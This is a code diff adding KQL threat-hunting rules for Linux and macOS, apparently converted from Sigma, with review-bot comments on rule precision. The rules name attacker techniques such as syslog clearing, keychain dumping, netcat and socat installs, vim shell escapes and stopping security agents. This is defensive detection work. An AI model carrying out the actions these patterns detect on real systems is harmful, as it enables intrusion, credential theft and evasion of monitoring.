+| where ((ProcessCommandLine contains "install" and (FolderPath endswith "/apt" or FolderPath endswith "/apt-get")) or ((ProcessCommandLine contains "--install" or ProcessCommandLine contains "-i") and FolderPath endswith "/dpkg") or (ProcessCommandLine contains "-i" and FolderPath endswith "/rpm") or ((ProcessCommandLine contains "localinstall" or ProcessCommandLine contains "install") and FolderPath endswith "/yum")) and (ProcessCommandLine contains "nmap" or ProcessCommandLine contains " nc" or ProcessCommandLine contains "netcat" or ProcessCommandLine contains "wireshark" or ProcessCommandLine contains "tshark" or ProcessCommandLine contains "openconnect" or ProcessCommandLine contains "proxychains" or ProcessCommandLine contains "socat")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql
new file mode 100644
index 00000000..b2e94c6a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/syslog_clearing_or_removal_via_system_utilities.kql
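Review bot: `ProcessCommandLine contains " nc"` in the package-keyword group has no trailing boundary, so `apt install ncdu` or `yum install ncurses-devel` are reported as netcat installs; a bounded pattern such as `ProcessCommandLine matches regex "\\snc(\\s|$)"` keeps the netcat case without catching every package whose name starts with `nc`. The `contains "-i"` tests for `/dpkg` and `/rpm` are similarly loose (any option containing `-i`, including `--ignore-depends`, passes), but since the second group still has to match a tool name this is less of a precision problem and can probably stay.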
@@ -0,0 +1,13 @@
+// Title: Syslog Clearing or Removal Via System Utilities
+// Author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
+// Date: 2021-10-15
+// Level: high
+// Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+// - Log rotation.
+// - Maintenance.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/var/log/syslog" and ((ProcessCommandLine contains "/dev/null" and FolderPath endswith "/cp") or ((ProcessCommandLine contains "-sf " or ProcessCommandLine contains "-sfn " or ProcessCommandLine contains "-sfT ") and (ProcessCommandLine contains "/dev/null " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/ln") or FolderPath endswith "/mv" or ((ProcessCommandLine contains " -r " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " -rf " or ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/rm") or (ProcessCommandLine contains "-u " and FolderPath endswith "/shred") or ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "-c " or ProcessCommandLine contains "--size") and (ProcessCommandLine contains "0 " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/truncate") or FolderPath endswith "/unlink")) or ((ProcessCommandLine contains "journalctl --vacuum" or ProcessCommandLine contains "journalctl --rotate") or (ProcessCommandLine contains " > /var/log/syslog" or ProcessCommandLine contains " >/var/log/syslog" or ProcessCommandLine contains " >| /var/log/syslog" or ProcessCommandLine contains ": > /var/log/syslog" or ProcessCommandLine contains ":> /var/log/syslog" or ProcessCommandLine contains ":>/var/log/syslog" or ProcessCommandLine contains ">|/var/log/syslog"))
\ No
newline at end of file
diff --git a/KQL/rules/linux/process_creation/system_information_discovery.kql b/KQL/rules/linux/process_creation/system_information_discovery.kql
new file mode 100644
index 00000000..0ba5ef2c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/system_information_discovery.kql
@@ -0,0 +1,12 @@
+// Title: System Information Discovery
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-08
+// Level: informational
+// Description: Detects system information discovery commands
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/uname" or FolderPath endswith "/hostname" or FolderPath endswith "/uptime" or FolderPath endswith "/lspci" or FolderPath endswith "/dmidecode" or FolderPath endswith "/lscpu" or FolderPath endswith "/lsmod"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql b/KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql
new file mode 100644
index 00000000..d96b0811
--- /dev/null
+++ b/KQL/rules/linux/process_creation/system_network_connections_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: System Network Connections Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of system utilities to discover system network connections
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where (FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat") and (not((FolderPath endswith "/who" and InitiatingProcessCommandLine contains "/usr/bin/landscape-sysinfo")))
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/system_network_discovery_linux.kql b/KQL/rules/linux/process_creation/system_network_discovery_linux.kql
new file mode 100644
index 00000000..1591d667
--- /dev/null
+++ b/KQL/rules/linux/process_creation/system_network_discovery_linux.kql
@@ -0,0 +1,12 @@
+// Title: System Network Discovery - Linux
+// Author: Ömer Günal and remotephone, oscd.community
+// Date: 2020-10-06
+// Level: informational
+// Description: Detects enumeration of local network configuration
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/etc/resolv.conf" or (FolderPath endswith "/firewall-cmd" or FolderPath endswith "/ufw" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/ss" or FolderPath endswith "/ip" or FolderPath endswith "/ifconfig" or FolderPath endswith "/systemd-resolve" or FolderPath endswith "/route")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/touch_suspicious_service_file.kql b/KQL/rules/linux/process_creation/touch_suspicious_service_file.kql
new file mode 100644
index 00000000..3ae7800a
--- /dev/null
+++ b/KQL/rules/linux/process_creation/touch_suspicious_service_file.kql
@@ -0,0 +1,12 @@
+// Title: Touch Suspicious Service File
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-11
+// Level: medium
+// Description: Detects usage of the "touch" process in service file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.006
+// False Positives:
+// - Admin changing date of files.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -t " and ProcessCommandLine endswith ".service" and FolderPath endswith "/touch"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql
new file mode 100644
index 00000000..a95a5a35
--- /dev/null
+++ b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_execve_hijack.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Execve Hijack
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "execve_hijack" and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql
new file mode 100644
index 00000000..bc47c39c
--- /dev/null
+++ b/KQL/rules/linux/process_creation/triple_cross_ebpf_rootkit_install_commands.kql
@@ -0,0 +1,12 @@
+// Title: Triple Cross eBPF Rootkit Install Commands
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-05
+// Level: high
+// Description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1014
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " qdisc " or ProcessCommandLine contains " filter ") and (ProcessCommandLine contains " tc " and ProcessCommandLine contains " enp0s3 ") and FolderPath endswith "/sudo"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql b/KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql
new file mode 100644
index 00000000..53d35b3e
--- /dev/null
+++ b/KQL/rules/linux/process_creation/ufw_force_stop_using_ufw_init.kql
@@ -0,0 +1,12 @@
+// Title: Ufw Force Stop Using Ufw-Init
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-01-18
+// Level: medium
+// Description: Detects attempts to force stop the ufw using ufw-init
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Network administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-ufw-init" and ProcessCommandLine contains "force-stop") or (ProcessCommandLine contains "ufw" and ProcessCommandLine contains "disable")
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql b/KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql
new file mode 100644
index 00000000..188348f0
--- /dev/null
+++ b/KQL/rules/linux/process_creation/user_added_to_root_sudoers_group_using_usermod.kql
@@ -0,0 +1,12 @@
+// Title: User Added To Root/Sudoers Group Using Usermod
+// Author: TuanLe (GTSC)
+// Date: 2022-12-21
+// Level: medium
+// Description: Detects usage of the "usermod" binary to add users add users to the root or suoders groups
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence
+// False Positives:
+// - Legitimate administrator activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-aG root" or ProcessCommandLine contains "-aG sudoers") and FolderPath endswith "/usermod"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql b/KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql
new file mode 100644
index 00000000..cafb5b95
--- /dev/null
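Review bot: In the usermod rule the second pattern, `"-aG sudoers"`, names the sudoers file rather than a group; the privileged group on Debian-derived systems is normally `sudo` and on RHEL-derived systems `wheel`, so that branch is unlikely to match a real group-membership grant (the upstream Sigma rule appears to carry the same strings, so confirm there before changing the conversion). Adding `ProcessCommandLine contains "-aG sudo"` and `ProcessCommandLine contains "-aG wheel"` next to the existing patterns would cover the common case; the split form `-a -G root` and the long form `--append --groups root` are also not matched by the current substrings. The description's duplicated "add users add users" and the "suoders" typo come from the source rule and are worth fixing upstream as well.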
+++ b/KQL/rules/linux/process_creation/user_has_been_deleted_via_userdel.kql
@@ -0,0 +1,12 @@
+// Title: User Has Been Deleted Via Userdel
+// Author: Tuan Le (NCSGroup)
+// Date: 2022-12-26
+// Level: medium
+// Description: Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1531
+// False Positives:
+// - Legitimate administrator activities
+
+DeviceProcessEvents
+| where FolderPath endswith "/userdel"
\ No newline at end of file
diff --git a/KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql b/KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql
new file mode 100644
index 00000000..62f7be84
--- /dev/null
+++ b/KQL/rules/linux/process_creation/vim_gtfobin_abuse_linux.kql
@@ -0,0 +1,11 @@
+// Title: Vim GTFOBin Abuse - Linux
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-28
+// Level: high
+// Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands.
+// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1083
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ":!/" or ProcessCommandLine contains ":lua " or ProcessCommandLine contains ":py " or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/dash" or ProcessCommandLine contains "/bin/fish" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/zsh") and ((ProcessCommandLine contains " --cmd" or ProcessCommandLine contains " -c ") and (FolderPath endswith "/rvim" or FolderPath endswith "/vim" or FolderPath endswith "/vimdiff"))
\ No newline at end of file
diff --git a/KQL/rules/macos/file_event/macos_emond_launch_daemon.kql b/KQL/rules/macos/file_event/macos_emond_launch_daemon.kql
new file mode 100644
index 00000000..7d4cf49c
--- /dev/null
+++ b/KQL/rules/macos/file_event/macos_emond_launch_daemon.kql
@@ -0,0 +1,12 @@
+// Title: MacOS Emond Launch Daemon
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-23
+// Level: medium
+// Description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.014
+// False Positives:
+// - Legitimate administration activities
+
+DeviceFileEvents
+| where (FolderPath contains "/etc/emond.d/rules/" and FolderPath endswith ".plist") or FolderPath contains "/private/var/db/emondClients/"
\ No newline at end of file
diff --git a/KQL/rules/macos/file_event/startup_item_file_created_macos.kql b/KQL/rules/macos/file_event/startup_item_file_created_macos.kql
new file mode 100644
index 00000000..3b979933
--- /dev/null
+++ b/KQL/rules/macos/file_event/startup_item_file_created_macos.kql
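Review bot: Both `DeviceFileEvents` rules in this change (this hunk and the Startup Item File Created hunk that follows) test the file suffix on `FolderPath`, as in `FolderPath endswith ".plist"`, but the Defender advanced-hunting schema describes `FolderPath` in DeviceFileEvents as the folder containing the file, with the name carried in `FileName`; if that is how the target tables are populated, the `.plist` condition never matches and both rules go silent while appearing to work. Suggest `FileName endswith ".plist"` for the suffix test and keeping `FolderPath` for the directory prefixes, e.g. `(FolderPath contains "/etc/emond.d/rules/" and FileName endswith ".plist")`. Worth verifying against the actual schema before changing the converter's field mapping for file-event rules, since the process-creation rules legitimately use the full image path in `FolderPath`.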
@@ -0,0 +1,14 @@
+// Title: Startup Item File Created - MacOS
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-14
+// Level: low
+// Description: Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.
+// Adversaries may use startup items automatically executed at boot initialization to establish persistence.
+// Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.privilege-escalation, attack.t1037.005
+// False Positives:
+// - Legitimate administration activities
+
+DeviceFileEvents
+| where FolderPath endswith ".plist" and (FolderPath startswith "/Library/StartupItems/" or FolderPath startswith "/System/Library/StartupItems")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/binary_padding_macos.kql b/KQL/rules/macos/process_creation/binary_padding_macos.kql
new file mode 100644
index 00000000..1bc6cb68
--- /dev/null
+++ b/KQL/rules/macos/process_creation/binary_padding_macos.kql
@@ -0,0 +1,12 @@
+// Title: Binary Padding - MacOS
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: high
+// Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.001
+// False Positives:
+// - Legitimate script work
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/random" or ProcessCommandLine contains "if=/dev/urandom") and FolderPath endswith "/dd") or (ProcessCommandLine contains "-s +" and FolderPath endswith "/truncate")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql b/KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql
new file mode 100644
index 00000000..d8070d43
--- /dev/null
+++ b/KQL/rules/macos/process_creation/clipboard_data_collection_via_osascript.kql
@@ -0,0 +1,12 @@
+// Title: Clipboard Data Collection Via OSAScript
+// Author: Sohan G (D4rkCiph3r)
+// Date: 2023-01-31
+// Level: high
+// Description: Detects possible collection of data from the clipboard via execution of the osascript binary
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.execution, attack.t1115, attack.t1059.002
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "osascript" and ProcessCommandLine contains " -e " and ProcessCommandLine contains "clipboard"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql b/KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql
new file mode 100644
index 00000000..27c7fb62
--- /dev/null
+++ b/KQL/rules/macos/process_creation/creation_of_a_local_user_account.kql
@@ -0,0 +1,12 @@
+// Title: Creation Of A Local User Account
+// Author: Alejandro Ortuno, oscd.community
+// Date: 2020-10-06
+// Level: low
+// Description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
+// MITRE Tactic: Persistence
+// Tags: attack.t1136.001, attack.persistence
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "create" and FolderPath endswith "/dscl") or (ProcessCommandLine contains "addUser" and FolderPath endswith "/sysadminctl")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql b/KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql
new file mode 100644
index 00000000..cb3815a2
--- /dev/null
+++ b/KQL/rules/macos/process_creation/credentials_from_password_stores_keychain.kql
@@ -0,0 +1,12 @@
+// Title: Credentials from Password Stores - Keychain
+// Author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems)
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects passwords dumps from Keychain
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "find-certificate" or ProcessCommandLine contains " export ") and FolderPath =~ "/usr/bin/security") or (ProcessCommandLine contains " dump-keychain " or ProcessCommandLine contains " login-keychain ")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/credentials_in_files.kql b/KQL/rules/macos/process_creation/credentials_in_files.kql
new file mode 100644
index 00000000..35401654
--- /dev/null
+++ b/KQL/rules/macos/process_creation/credentials_in_files.kql
@@ -0,0 +1,10 @@
+// Title: Credentials In Files
+// Author: Igor Fits, Mikhail Larin, oscd.community
+// Date: 2020-10-19
+// Level: high
+// Description: Detecting attempts to extract passwords with grep and laZagne
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "password" and FolderPath endswith "/grep") or ProcessCommandLine contains "laZagne"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql b/KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql
new file mode 100644
index 00000000..3de0b28d
--- /dev/null
+++ b/KQL/rules/macos/process_creation/decode_base64_encoded_text_macos.kql
@@ -0,0 +1,12 @@
+// Title: Decode Base64 Encoded Text -MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of base64 utility to decode arbitrary base64-encoded text
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "-d" and FolderPath =~ "/usr/bin/base64"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/disable_security_tools.kql b/KQL/rules/macos/process_creation/disable_security_tools.kql
new file mode 100644
index 00000000..8fed30a3
--- /dev/null
+++ b/KQL/rules/macos/process_creation/disable_security_tools.kql
@@ -0,0 +1,12 @@
+// Title: Disable Security Tools
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: medium
+// Description: Detects disabling security tools
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "unload" and FolderPath =~ "/bin/launchctl") and (ProcessCommandLine contains "com.objective-see.lulu.plist" or ProcessCommandLine contains "com.objective-see.blockblock.plist" or ProcessCommandLine contains "com.google.santad.plist" or ProcessCommandLine contains "com.carbonblack.defense.daemon.plist" or ProcessCommandLine contains "com.carbonblack.daemon.plist" or ProcessCommandLine contains "at.obdev.littlesnitchd.plist" or ProcessCommandLine contains "com.tenablesecurity.nessusagent.plist" or ProcessCommandLine contains "com.opendns.osx.RoamingClientConfigUpdater.plist" or ProcessCommandLine contains "com.crowdstrike.falcond.plist" or ProcessCommandLine contains "com.crowdstrike.userdaemon.plist" or ProcessCommandLine contains "osquery" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "td-agent")) or (ProcessCommandLine contains "disable" and FolderPath =~ "/usr/sbin/spctl")
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql b/KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql
new file mode 100644
index 00000000..acad549f
--- /dev/null
+++ b/KQL/rules/macos/process_creation/disk_image_creation_via_hdiutil_macos.kql
@@ -0,0 +1,12 @@
+// Title: Disk Image Creation Via Hdiutil - MacOS
+// Author: Omar Khaled (@beacon_exe)
+// Date: 2024-08-10
+// Level: medium
+// Description: Detects the execution of the hdiutil utility in order to create a disk image.
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration
+// False Positives:
+// - Legitimate usage of hdiutil by administrators and users.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "create" and FolderPath endswith "/hdiutil"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql b/KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql
new file mode 100644
index 00000000..1632ad0c
--- /dev/null
+++ b/KQL/rules/macos/process_creation/disk_image_mounting_via_hdiutil_macos.kql
@@ -0,0 +1,12 @@
+// Title: Disk Image Mounting Via Hdiutil - MacOS
+// Author: Omar Khaled (@beacon_exe)
+// Date: 2024-08-10
+// Level: medium
+// Description: Detects the execution of the hdiutil utility in order to mount disk images.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.collection, attack.t1566.001, attack.t1560.001
+// False Positives:
+// - Legitimate usage of hdiutil by administrators and users.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "attach " or ProcessCommandLine contains "mount ") and FolderPath endswith "/hdiutil"
\ No newline at end of file
diff --git a/KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql b/KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql
new file mode 100644
index 00000000..05454ab1
--- /dev/null
+++ b/KQL/rules/macos/process_creation/file_and_directory_discovery_macos.kql
@@ -0,0 +1,12 @@ +// Title: File and Directory Discovery - MacOS +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: informational +// Description: Detects usage of system utilities to discover files and directories +// MITRE Tactic: Discovery +// Tags: attack.discovery, attack.t1083 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where (ProcessCommandLine matches regex "(.){200,}" and FolderPath =~ "/usr/bin/file") or FolderPath =~ "/usr/bin/find" or FolderPath =~ "/usr/bin/mdfind" or (ProcessCommandLine contains "-R" and FolderPath =~ "/bin/ls") or FolderPath =~ "/tree" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql b/KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql new file mode 100644 index 00000000..18b4e268 --- /dev/null +++ b/KQL/rules/macos/process_creation/file_download_via_nscurl_macos.kql @@ -0,0 +1,12 @@ +// Title: File Download Via Nscurl - MacOS +// Author: Daniel Cortez +// Date: 2024-06-04 +// Level: medium +// Description: Detects the execution of the nscurl utility in order to download files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105 +// False Positives: +// - Legitimate usage of nscurl by administrators and users. + +DeviceProcessEvents +| where (ProcessCommandLine contains "--download " or ProcessCommandLine contains "--download-directory " or ProcessCommandLine contains "--output " or ProcessCommandLine contains "-dir " or ProcessCommandLine contains "-dl " or ProcessCommandLine contains "-ld" or ProcessCommandLine contains "-o ") and FolderPath endswith "/nscurl" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/file_time_attribute_change.kql b/KQL/rules/macos/process_creation/file_time_attribute_change.kql new file mode 100644 index 00000000..e51178de --- /dev/null 
+++ b/KQL/rules/macos/process_creation/file_time_attribute_change.kql @@ -0,0 +1,10 @@ +// Title: File Time Attribute Change +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: medium +// Description: Detect file time attribute change to hide new or changes to existing files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.006 + +DeviceProcessEvents +| where (ProcessCommandLine contains "-t" or ProcessCommandLine contains "-acmr" or ProcessCommandLine contains "-d" or ProcessCommandLine contains "-r") and FolderPath endswith "/touch" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql b/KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql new file mode 100644 index 00000000..a5ade537 --- /dev/null +++ b/KQL/rules/macos/process_creation/gatekeeper_bypass_via_xattr.kql @@ -0,0 +1,12 @@ +// Title: Gatekeeper Bypass via Xattr +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: low +// Description: Detects macOS Gatekeeper bypass via xattr utility +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "-d" and ProcessCommandLine contains "com.apple.quarantine") and FolderPath endswith "/xattr" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql b/KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql new file mode 100644 index 00000000..20f6e7b1 --- /dev/null +++ b/KQL/rules/macos/process_creation/guest_account_enabled_via_sysadminctl.kql 
@@ -0,0 +1,10 @@ +// Title: Guest Account Enabled Via Sysadminctl +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-02-18 +// Level: low +// Description: Detects attempts to enable the guest account using the sysadminctl utility +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.initial-access, attack.t1078, attack.t1078.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -guestAccount" and ProcessCommandLine contains " on") and FolderPath endswith "/sysadminctl" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/gui_input_capture_macos.kql b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql new file mode 100644 index 00000000..4c4c9582 --- /dev/null +++ b/KQL/rules/macos/process_creation/gui_input_capture_macos.kql @@ -0,0 +1,12 @@ +// Title: GUI Input Capture - macOS +// Author: remotephone, oscd.community +// Date: 2020-10-13 +// Level: low +// Description: Detects attempts to use system dialog prompts to capture user credentials +// MITRE Tactic: Collection +// Tags: attack.collection, attack.credential-access, attack.t1056.002 +// False Positives: +// - Legitimate administration tools and activities + +DeviceProcessEvents +| where (ProcessCommandLine contains "-e" and ProcessCommandLine contains "display" and ProcessCommandLine contains "dialog" and ProcessCommandLine contains "answer") and (ProcessCommandLine contains "admin" or ProcessCommandLine contains "administrator" or ProcessCommandLine contains "authenticate" or ProcessCommandLine contains "authentication" or ProcessCommandLine contains "credentials" or ProcessCommandLine contains "pass" or ProcessCommandLine contains "password" or ProcessCommandLine contains "unlock") and FolderPath endswith "/osascript" \ No newline at end of file 
diff --git a/KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql b/KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql new file mode 100644 index 00000000..04d4584f --- /dev/null +++ b/KQL/rules/macos/process_creation/hidden_flag_set_on_file_directory_via_chflags_macos.kql @@ -0,0 +1,13 @@ +// Title: Hidden Flag Set On File/Directory Via Chflags - MacOS +// Author: Omar Khaled (@beacon_exe) +// Date: 2024-08-21 +// Level: medium +// Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. +// When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.command-and-control, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 +// False Positives: +// - Legitimate usage of chflags by administrators and users. + +DeviceProcessEvents +| where ProcessCommandLine contains "hidden " and FolderPath endswith "/chflags" \ No newline at end of file diff --git a/KQL/rules/macos/process_creation/hidden_user_creation.kql b/KQL/rules/macos/process_creation/hidden_user_creation.kql new file mode 100644 index 00000000..b494e414 --- /dev/null +++ b/KQL/rules/macos/process_creation/hidden_user_creation.kql 
